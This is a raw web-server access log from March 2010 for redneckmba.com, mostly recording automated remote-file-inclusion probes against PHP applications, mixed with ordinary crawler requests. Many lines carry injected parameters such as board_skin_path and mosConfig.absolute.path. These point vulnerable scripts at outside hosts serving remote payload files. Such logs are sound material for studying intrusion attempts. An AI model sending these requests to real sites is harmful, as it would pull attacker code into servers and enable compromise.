213.175.197.86 - - [08/Mar/2010:03:37:14 -0800] "GET /////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:37:14 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:37:15 -0800] "GET /////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:37:15 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:37:15 -0800] "GET /logs/access.log//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.195.112.163 - - [08/Mar/2010:03:37:56 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
67.195.112.163 - - [08/Mar/2010:03:38:06 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1439644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:39:56 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:39:56 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:39:56 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:00 -0800] "GET /////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:00 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:00 -0800] "GET /logs/access.log%20%20//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:40:06 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:40:06 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:40:06 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:12 -0800] "GET /////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:12 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:12 -0800] "GET /logs/access.log%20%20//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:34 -0800] "GET /logs/access.log//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:34 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:40:34 -0800] "GET /////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:38 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:38 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:38 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:45 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:45 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:43:45 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.130.32.85 - - [08/Mar/2010:03:46:55 -0800] "GET /old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.130.32.85 - - [08/Mar/2010:03:46:55 -0800] "GET /logs/old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.130.32.85 - - [08/Mar/2010:03:46:55 -0800] "GET /logs/access_100104.log/old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
110.45.145.178 - - [08/Mar/2010:03:52:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:04:00:49 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:04:06:10 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:04:06:10 -0800] "GET /write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.103.87.96 - - [08/Mar/2010:04:06:10 -0800] "GET /logs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:23 -0800] "GET /logs//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:23 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:23 -0800] "GET /login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:29 -0800] "GET /login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:29 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:07:29 -0800] "GET /logs//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:08:19 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:08:19 -0800] "GET /logs//login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.227.136.138 - - [08/Mar/2010:04:08:19 -0800] "GET /login.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.206 - - [08/Mar/2010:04:15:26 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:04:20:33 -0800] "GET /logs/access_091012.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:04:32:50 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:04:33:03 -0800] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
218.38.12.239 - - [08/Mar/2010:04:34:55 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:08 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:08 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:08 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:11 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:11 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:04:36:11 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:04:42:55 -0800] "GET /blog/?feed=rss2 HTTP/1.0" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [08/Mar/2010:04:48:55 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:04:58:13 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:58:27 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:58:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:58:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.56.31 - - [08/Mar/2010:04:58:48 -0800] "GET /logs/access.log//login.php?dir=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
77.222.56.31 - - [08/Mar/2010:04:58:52 -0800] "GET /login.php?dir=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
77.222.56.31 - - [08/Mar/2010:04:58:52 -0800] "GET /logs//login.php?dir=ftp://63.80.200.42/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:59:52 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:59:52 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.69.40.227 - - [08/Mar/2010:04:59:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:06 -0800] "GET /logs//good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:07 -0800] "GET /logs/access.log%20%20//good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:07 -0800] "GET /good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:10:16 -0800] "GET /logs/access_091228.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:10:16 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.237.78.176 - - [08/Mar/2010:05:10:17 -0800] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:10:19 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:10:19 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:10:19 -0800] "GET /write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:25 -0800] "GET /logs/access.log%20%20//good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:25 -0800] "GET /good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
80.74.128.40 - - [08/Mar/2010:05:10:26 -0800] "GET /logs//good.php?board_skin_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:40 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:57 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:10:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
207.46.204.178 - - [08/Mar/2010:05:17:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:37 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:05:17:53 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
207.46.204.178 - - [08/Mar/2010:05:18:11 -0800] "GET /?D=D HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
66.216.127.211 - - [08/Mar/2010:05:19:45 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
66.216.127.211 - - [08/Mar/2010:05:19:46 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:22:23 -0800] "GET /write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:22:23 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:05:22:28 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.municipiodemejia.gov.ec//administrator/components/com_search/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:05:23:35 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:05:23:35 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
74.50.50.79 - - [08/Mar/2010:05:23:59 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
74.50.50.79 - - [08/Mar/2010:05:23:59 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
188.138.48.21 - - [08/Mar/2010:05:25:48 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "redneckmba.com"
188.138.48.21 - - [08/Mar/2010:05:25:48 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:05:26:35 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:05:26:41 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:05:26:41 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
203.253.198.140 - - [08/Mar/2010:05:32:22 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
203.253.198.140 - - [08/Mar/2010:05:32:22 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:05:37:51 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:05:37:51 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:05:37:51 -0800] "GET /write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.138.48.21 - - [08/Mar/2010:05:38:31 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "redneckmba.com"
188.138.48.21 - - [08/Mar/2010:05:38:32 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "redneckmba.com"
66.216.127.211 - - [08/Mar/2010:05:38:43 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
66.216.127.211 - - [08/Mar/2010:05:38:43 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:05:39:30 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
